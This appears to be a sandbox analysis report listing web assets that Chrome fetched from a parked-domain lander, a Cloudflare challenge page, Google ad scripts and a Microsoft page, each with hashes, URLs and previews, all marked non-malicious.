                                                                                                                          Preview:<svg fill='#0f1c21' xmlns="http://www.w3.org/2000/svg" height="24" viewBox="0 0 24 24" width="24"><path d="M0 0h24v24H0z" fill="none"/><path d="M5.88 4.12L13.76 12l-7.88 7.88L8 22l10-10L8 2z"/></svg>
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5094
                                                                                                                          Entropy (8bit):4.834039771497343
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:A8FEAF8EA80C17228A67DFEB1E251D8F
                                                                                                                          SHA1:38A4598BA356C8E43E6A6EA2E59587AB76D26A05
                                                                                                                          SHA-256:35F933EFDC4AC3426775ABF70B002C39D5A9D98B343A11E44A21EB3D0C952FD3
                                                                                                                          SHA-512:0E969BAB0E5338E0EEC990D39A01D13BB88A687EF4986FC1407C2416014179A4D15BDD61074441014487E4E978D1025FE9B6A1D16BFDE3CD706B0F6073C6C094
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg xmlns="http://www.w3.org/2000/svg" width="75.320129mm" height="92.604164mm" viewBox="0 0 75.320129 92.604164">. <g transform="translate(53.548057 -183.975276) scale(1.4843)">. <path fill="#ff2116" d="M-29.632812 123.94727c-3.551967 0-6.44336 2.89347-6.44336 6.44531v49.49804c0 3.55185 2.891393 6.44532 6.44336 6.44532H8.2167969c3.5519661 0 6.4433591-2.89335 6.4433591-6.44532v-40.70117s.101353-1.19181-.416015-2.35156c-.484969-1.08711-1.275391-1.84375-1.275391-1.84375a1.0584391 1.0584391 0 0 0-.0059-.008l-9.3906254-9.21094a1.0584391 1.0584391 0 0 0-.015625-.0156s-.8017392-.76344-1.9902344-1.27344c-1.39939552-.6005-2.8417968-.53711-2.8417968-.53711l.021484-.002z" color="#000" font-family="sans-serif" overflow="visible" paint-order="markers fill stroke" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feat
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):4021
                                                                                                                          Entropy (8bit):7.935074540109196
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:7ADF67E30A494611ABF7C19503303F7E
                                                                                                                          SHA1:2C4D0B6B143DF7165E50D35E629C8854830597DC
                                                                                                                          SHA-256:D3EF04CF96B162CB6B94CC1E27FABC784555F85B16BD9086D6D0236423D2728B
                                                                                                                          SHA-512:5E7C756097CCD3F6BFE50FAA87606DABDB829CE4E96C24B22B428BC5EFDEC21B2F2220FA3AF9CE0AFA0994B285BD1D9549330E1A1A039DEA710124DF61DAC63B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://bookingmanageview.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/f3b948d8acb8/main.js?
                                                                                                                          Preview:(./..X,}...-..F*m..-.6N.MUG/..Q.:%SU....N...."a...r../.*.......okr.0.X4.......T......[......oL...+\..8./..l..u........o.Z>./....q........-~.fp...0G..~M..V=.9...y..'...)n.G".....*.F.sn.....F..X...F..R.L.<..V..._T....{.2p.......j...0...2.l.0{.F....}.L...e0...;....Je.GvY......W..*(.@..r...z..@ ....<........?....7..I[..n....X.[......Q....<[..Y.i..0......3..Q...fXhh...Zd....].04......V.E*.0w.b..;....~.~`_.P.nW...s....z.....{.r...w.>..xU..O.g.D=...UUS...$..a....9./.......q.o\.....3..........R....U...z..`.dN..G.T.A.....eR.*.g...,.... i...X!.'3..[......Gz.0..T...'yW.D.4..D5..:.wg75?.T>2%.'.#+r....gR....n]...%..F.e...!.. .AwvY.A7.....VR+A....Fc...\...R...1.$..?.......r.....7@..C......>...7.K.]t.I......x....jTM B.J.z.4...:....G..`D..@*..3~[#=.5A.[[..mV)..R-.....z...v.E_.:,<................k........l...w....F.7.mM..@v...{~[....H.y..t~.>4...c...$.......YK1.:.7.N.f)...C.1......}A,.:...s.{....a.;...P..'....'.V.....#.D...VdQS.?..h(..YKG./..(2..1V...e0.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), truncated
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):20
                                                                                                                          Entropy (8bit):1.1219280948873622
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:3970E82605C7D109BB348FC94E9EECC0
                                                                                                                          SHA1:E03849EA786B9F7B28A35C17949E85A93EB1CFF1
                                                                                                                          SHA-256:F5D031AF01F137AE07FA71720FAB94D16CC8A2A59868766002918B7C240F3967
                                                                                                                          SHA-512:59C8107C5A9678CD4B6BD1D194AC0987CE0D0542CEEECE8430452C238375AA49F0CEA3646935315EA994D8AB05E56AF112157122BE8272185830093FD5922B67
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://img1.wsimg.com/parking-lander/px.js?ch=1&abp=1&gdabp=true
                                                                                                                          Preview:....................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 239061
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):39412
                                                                                                                          Entropy (8bit):7.992070761371293
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:
                                                                                                                          MD5:44AC81BEB1B9FE9A368F4F25A8A87C62
                                                                                                                          SHA1:D2A4E4A8A5514230672545DD8C360CE220A084CF
                                                                                                                          SHA-256:4DB7B11D5CCA4109E266E1D55FBC6F5F8F23F01A18E4EEDADC51F3E9AC031A8E
                                                                                                                          SHA-512:E6D1B93BF814418671443BAA68F7FCC0FD8E784B5EF302AB9EFA4D5EBE1955E6D28A5E3F235647C0484E022CCE86BB0B59A0D3D565D735A2630E38765DE90573
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://img1.wsimg.com/parking-lander/static/css/main.637d6c71.css
                                                                                                                          Preview:...........ks...0.Wx..]...._..<.%v.'q.'..wW.....0.k....|...0?m~.H..........O.....u..$..j*~...o...R..s..8....D.....>O...r...;9...V..Y..|....c.1...q....(..d..\.......]...h...q..3.m.....k '....-...i...s..1.^....B3..)........>y-j.....X...V.G...@Q.....9}%U.v...P...eM<...'..:T......b8.~.)k.C@SoI..mi.?t......f.c...."...eE.....X.Y.g+../?...Y........g.'.....Q..h:.`.....z.J.....oy..$........l(.H..D.,...u.!.G#>.r)p..<z......b\.!.?..D....4...i@..&..$.o...`.,..<.......h.F......b..Q...{...5.s..{..(..\r.:E..ei...SC..\D._..............L.;.od..h...6..6lK..T:Q..(%.._l~..4.!...... ..C...DC..Q...n.....{u.@.M..r.R..|wkL]. ......1.j..^..V.,.....E.q..bg\..:V...H@32._5...rg.....7n?+.e8....X.......#..5\!Q......gQ.....A.D....)N#.4.o..i..@..$t..]X....~..;..Z...V.KF#a..4\..z......*4...zl...;e.OL-.;D...(.......T..g...y\t..J.B..D.....V~..>...uT[.&I%..k.Q6..agd.....j..s9N....j.e....|'....f..m.id%....u.I...9;.`S.Q.#.l+....&w...kOjM.....[Gp.~eZ=a...........m#...C
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1333528
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):342759
                                                                                                                          Entropy (8bit):7.998805207290229
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:
                                                                                                                          MD5:BA545214590B4BEE253E327A526DD39E
                                                                                                                          SHA1:A6F45BCF7EC2EE097AFAC6F626B929D4DA9FA691
                                                                                                                          SHA-256:9AA7CF6FDCDCC7631024941AFEF1D9728F453CEBE0A0A56F58E44532720F80EB
                                                                                                                          SHA-512:BE14C642B4ED2A373B1CE5BA92418DCE2C259BEC1ADF52C4FC6EA808AC0A62A32D7E7DF5F18C089FB7D823FB5CC1ACB6FD4887CB6D84717B9961F8E670CE95E0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://img1.wsimg.com/parking-lander/static/js/main.f335a838.js
                                                                                                                          Preview:...........iW..(......#5i..h5......PC.y,a...[.d....oD.dST...{.Y...r...)#.w?.....\/l.(.sa.....q47.q..R...~..;.....F...~|.wp.:.g........v..^..d.{/.+....,c..M.....Oj;.P:.,.zs....Vo...~m..JY[j.......k............UK.,..p.....v.E%ml...2.OI..vx.......?%u...njcme...J...........H.jG.:issy...J...|.!\[[[f....G..:4.d.....Y.|s}.......k.W7.....A.v.S.W.u.AV.......T..}}y..`...ZK.}eeyc...J....*iuce...,..%....P..o.P...hj..rW$r......Kk...S....^>$..e.b.p.9..r..kl.L.:.M....y.;.|T..q.Ix6L...$.).'<.{..v.Y.GvN....$.....(..:a....`..s.e-.E.,g+.&..\Vo................}.e....U&....^v...Dung........>kn:.3...|.z.}v..og.m'...a.!.1^..8.R...... .R....yK..........C.`..{.k..M...............W.@..i............7.@9M.E.[.h.C4..........Vyoy.....2..6WV.+W.U..XY..."ET....6.....{...........O.W`......+RN.X.0....X......*...F........Xoyc.P.^e..&r..f..|....P...W.G.V........!*.,......;sXT....'..>...f.y.o.>.2....W...8..s...a...4D.S..g.....G.tz..K.:.p@.g..N..<..$....n....8..^.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):114
                                                                                                                          Entropy (8bit):4.802925647778009
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                          SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                          SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                          SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:http://oceanbreeze.com/
                                                                                                                          Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):29
                                                                                                                          Entropy (8bit):3.9353986674667634
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:6FED308183D5DFC421602548615204AF
                                                                                                                          SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                          SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                          SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://www.google.com/async/newtab_promos
                                                                                                                          Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (1967)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):144880
                                                                                                                          Entropy (8bit):5.535056612330804
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:2E9D5181232EA49118A5D6818FA56690
                                                                                                                          SHA1:84FED667D93A18C1A61CF78CA51BF41D8106A09E
                                                                                                                          SHA-256:597ABB69114DFA2BFB1EDA368C198F1C1F7C16B9540087AB2E7D54AE742C3AC1
                                                                                                                          SHA-512:7ADBC33A7D9FA545B805D1C900CCB017597309371F199ECB6F8783B5F542A2EE4DAAE46B1FC6F59F9FE7854C39F38953E6C24FB97E7B139B6652D6E22701559F
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://www.google.com/adsense/domains/caf.js?abp=1&gdabp=true
                                                                                                                          Preview:if(!window['googleNDT_']){window['googleNDT_']=(new Date()).getTime();}(function() {window.googleAltLoader=3;var sffeData_={service_host:"www.google.com",hash:"12128785251572431184",packages:"domains",module:"ads",version:"1",m:{cei:"17301437,17301439,17301442,17301548,17301266",ah:true,uatm:500,ecfc2:true,llrm:1000,lldl:"bS5zZWFycy5jb20=",abf:{"_disableAdRequestForNewConsentStrategy":true,"_enableNewConsentStrategy":true,"_fixCtcLinksOnIos":true,"_googEnableQup":true,"_switchGwsRequestToUseAdsenseDomain":true,"_useServerProvidedDomain":true,"_waitOnConsentForFirstPartyCookie":true,"enableEnhancedTargetingRsonc":true,"enableNonblockingSasCookie":true},mdp:1800000,ssdl:"YXBwc3BvdC5jb20sYmxvZ3Nwb3QuY29tLGJyLmNvbSxjby5jb20sY2xvdWRmcm9udC5uZXQsZXUuY29tLGhvcHRvLm9yZyxpbi5uZXQsdHJhbnNsYXRlLmdvb2csdWsuY29tLHVzLmNvbSx3ZWIuYXBw",cdl:false,cdh:"syndicatedsearch.goog",cdem:{"afs_aa_baseline":500,"afs_gpp_api":0,"disable_usp_api":50,"heterodyne_test":851,"ifr_unif":10,"ivt_changes":0,"rs_tcf":0}}}
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (535)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):536
                                                                                                                          Entropy (8bit):5.0823168879814675
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:74EE877D4098C1A5EFA16897412D6F62
                                                                                                                          SHA1:1142D63FBDE49B92F1BE8B33931F854433534D48
                                                                                                                          SHA-256:00BBD783E2163CEA47BA96FE8DADC4340C280C4949248594A5EDCB5FCBD94AC4
                                                                                                                          SHA-512:796579A6A75E894B37EC8A7CE13595DF9B0C44A7B30B20997F07BE507EAA10E6B38171E682306641D52F7EFFA54FAEB4D77C91CEA90B824BCF2970E4ED75F7F7
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://oceanbreeze.com/lander
                                                                                                                          Preview:<!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1&gdabp=true"></script><script>window.LANDER_SYSTEM="CP"</script><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/main.f335a838.js"></script><link href="https://img1.wsimg.com/parking-lander/static/css/main.637d6c71.css" rel="stylesheet"></head><body><div id="root"></div></body></html>.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (955), with CRLF line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):201253
                                                                                                                          Entropy (8bit):2.661810841903416
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:85DE642E1467807F64F7E10807DF3869
                                                                                                                          SHA1:C795B490811C0E5A1A8F3C3F620AAB9F00C34F07
                                                                                                                          SHA-256:5965B2C5472AACA1CD66EA5B0D07A971B961FEE72FC27EB1F6C760042084B21B
                                                                                                                          SHA-512:BF4EC56D6FC54EAAFBD57C4E4D06900D358E39CE15009FB983491B0A83ABB60A0A54F46BE86387AB837B4AE1D1F3FF99156D04207065B0F65F165B54CFAAF47B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://www.microsoft.com/en-us/microsoft-365/onedrive/online-cloud-storage
                                                                                                                          Preview:..<!DOCTYPE html><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext".. xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us".. xmlns="http://www.w3.org/1999/xhtml"><head><link rel="shortcut icon".. href="//www.microsoft.com/favicon.ico?v2" /><link.. type="text/css" rel="stylesheet".. href="https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css".. /><title>Your request has been blocked. This could be.. due to several reasons.</title><meta name="Title".. content="We are sorry, the page you requested cannot be.. found" /><meta name="CorrelationVector".. content="VbLZYbRlhU2hyedN.1" /><meta name="Description".. content="" /><meta name="MscomContentLocale".. content="en-us" /><meta name="
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):391
                                                                                                                          Entropy (8bit):4.729520059969888
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:1DD79DF28A7517F4F8688A66EDFB04FC
                                                                                                                          SHA1:4AA1200E3E4B50AEB64774E6667DDE9422658C38
                                                                                                                          SHA-256:5FC5D398706CE2D79CA71EAB32AB611D4511260B2D87B9D6D74A8EF59F9BEA8F
                                                                                                                          SHA-512:70CD8282458482ED3F123C0E61C81D1C257C2D4AF12D51674BDF46C748B576CC92CC364CB7DC49D1D7E6D5A4C11AD85AA8E798692414468F0F4531DF95ECF326
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:<svg fill='#0f1c21' xmlns="http://www.w3.org/2000/svg" width="200" height="200" viewBox="0 0 24 24"><path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"/><path d="M0 0h24v24H0z" fill="none"/></svg>.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5776
                                                                                                                          Entropy (8bit):7.938806206665634
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:D02BD7C8CA90CCD869B635361BC2AACE
                                                                                                                          SHA1:37BAE53EF3CF29882B83378BF44BA4610073817D
                                                                                                                          SHA-256:BEB03CE9C8F23B7D7D5F0B3CC17A3CA68F427FBFB8B1428105F33F348A7854C2
                                                                                                                          SHA-512:F3CD2937259AE6CDFEDDA64D0DEE9D96BCD2495D635242AF8DA16FF3585A3EFDBC3011E9DDD44D25E5D7F4737E7AAAFAAE3414BBC1DCAD1CDEF44FF16AE294DB
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:(./..X......3O ...D..'.. ..'.O.....-h...G....X).:!Y@~g..[....fE.@M.......BI.#U/..'....."w...h.-.AL."[..`IA78Q........T.XS.?.....S......r...D..2.........@.'+.=..""S|#...B9U.(...%.v.....$.8B.....n.^ &....!.e.. ...o...&R.?.......%..0t}.m.R.k/.-....EXR...Tk.x...W.c{..Ul.-T..'..R.....'...O..Kt}X.*.,i}_..}....x*...,.....,....B.D.3A..T_..=lNy....UE.$..O.......?P...K.....k..S...B...*......La.$.S.)..P!5.n|../...`.....)........*.X........c...ho.a....M....n.n..3....G...1..1\.);d..-6..}..Kj`..5S.[3f..0S.8^E.i.3.-3.=.)...Q}.7$y.*......nS..4.H.G......9.thd.....[4S.k.S1S.t..L...!.!....w1S~._+3.X.)w.Lyi....&K.7..h.......R.c.<.3.C.)o2S~.L9.3.\D3.m7S.e...Ly.Ly.f..)..L...t..H...-O.txce8>.RN..|.Ly..r#E.5.0S.......`.\G.....z.n...[.p.........@...L.......}#)...f.,.>.`....qS..7S.AU.7qR/.#.x4S.&n..}......9~.........?.......?....`.-9./$`..hL....g.>..cZS.m .......Z....S}.@...............j.....#...|.i......".....t.s..(.x....8B(.qd&....*.U......2U
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (65531)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):132139
                                                                                                                          Entropy (8bit):5.436500260765363
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:CE8307E3E9637A93F5522084BFC6D976
                                                                                                                          SHA1:88640B50D51DB364EA7803EE29CB2D984EDDA95D
                                                                                                                          SHA-256:8E41CA607FA77B9A0A7B86CC6EA1B57EDA1A2B99530AE2E3A54D0C8913A2A532
                                                                                                                          SHA-512:116C28604CAB737BFFD510752E4CF0BA80F1B183C7D13F1CE030EDDAB7C705F1306DA64C4C031A3BCB7B79FE2BEACC1C812ED2841F3C5EB231C56E17DA878474
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                          Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_2d gb_Pe gb_rd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Qd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_ld gb_pd gb_Hd gb_md\"\u003e\u003cdiv class\u003d\"gb_xd gb_sd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Kc gb_Nc gb_R\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):111
                                                                                                                          Entropy (8bit):5.474797290538805
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:3DA8489754D089433FC8490366902087
                                                                                                                          SHA1:1110AA3B68B53B3FF0AF4E248FFEDF852E36C465
                                                                                                                          SHA-256:4C8616504020FBE8DEA4DCA06172F7D475D7A2B542C8958185DC5B9103B11376
                                                                                                                          SHA-512:6AF0024D4F49D25C31B8DAA74CC8DC077E3E673347AAD7C98FA6262741D8416B5FFAFFF44D6939F3F9B6E633F0139BA7EFC20B3D7FCE3A443D1CC6C2BBFBD6AE
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:(./..X.....{. "Windows": 340,Android3iOS": 57Mac": 12Linux": 11TotalDownloads": 552.}..F .d.3..d..7L&....I..
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):15
                                                                                                                          Entropy (8bit):3.189898095464287
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:39A19D0882684989864FA50BCED6A2D1
                                                                                                                          SHA1:5CED55DAC2E0427E9DC605CEC1FEDAB0949EB15E
                                                                                                                          SHA-256:8FBEDED073249C3611742297EE96A976A95EE113F33B9A422A5D3A7A2DEB63E5
                                                                                                                          SHA-512:E795CB7DE27B42948B7DDFF19F3B401A8F95753AC7D37D9B5F52D8DACD2AA43A2AD9EACEC29F77D28080E20C21C48B9FA88A733FAC108939FB2F0EB036C7AEEE
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
                                                                                                                          Preview:/* empty css */
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (2412)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):172367
                                                                                                                          Entropy (8bit):5.555151369878942
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:F127A30F593CB96090AF164F4DD04E94
                                                                                                                          SHA1:8E45FAD5740967D50101E413F98F646D424E9385
                                                                                                                          SHA-256:6BE436287AF7A70143564DB4F2FFDCE5DED1241FFE85BF210E4495F873C63A33
                                                                                                                          SHA-512:D1A5DD175ABE8C4C7EC5C9E534E5C4B30A6F954F290ED05001FDDE5A6A92CF398604180BD1CCFB856A7C81B08C19F841624E4AECA7AB135B0C404C03E84989FC
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.WcyoQrvsWY0.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTt0d-Ss5kisT1M_8rsOzCdvCZrVWg"
                                                                                                                          Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Qi=function(a){if(4&a)return 2048&a?2048:4096&a?4096:0};_.Ri=class extends _.P{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Si,Vi,Wi,Yi,Zi,bj;Si=function(){return typeof BigInt==="function"};Vi=function(a){const b=a>>>0;_.Ti=b;_.Ui=(a-b)/4294967296>>>0};Wi=function(a,b){b=~b;a?a=~a+1:b+=1;return[a,b]};_.Xi=function(a){if(a<0){Vi(-a);const [b,c]=Wi(_.Ti,_.Ui);_.Ti=b>>>0;_.Ui=c>>>0}else Vi(a)};Yi=function(a){a=String(a);return"0000000".slice(a.length)+a};.Zi=function(a,b){b>>>=0;a>>>=0;if(b<=2097151)var c=""+(4294967296*b+a);else Si()?c=""+(BigInt(b)<<BigInt(32)|BigInt(a)):(c=(a>>>24|b<<8)&16777215,b=b>>16&65535,a=(a&16777215)+c*6777216+b*6710656,c+=b*8147497,b*=2,a>=1E7&&(c+=a/1E7>>>0,a%=1E7),c>=1E7&&(b+=c/1E7>>>0,c%=1E7),c=b+Yi(c)+Yi(a));return c};_.$i=function(a,b){if(b&2147483648)if(Si())a=""+(BigInt(b|0)<<BigInt(32)|BigInt(a>>>0));else{const [c,d]=Wi(a,b);a="-"+Zi(c,d)}else a=Zi(a,b);return a};._.aj
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):4054
                                                                                                                          Entropy (8bit):7.797012573497454
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                                                                                          SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                                                                                          SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                                                                                          SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
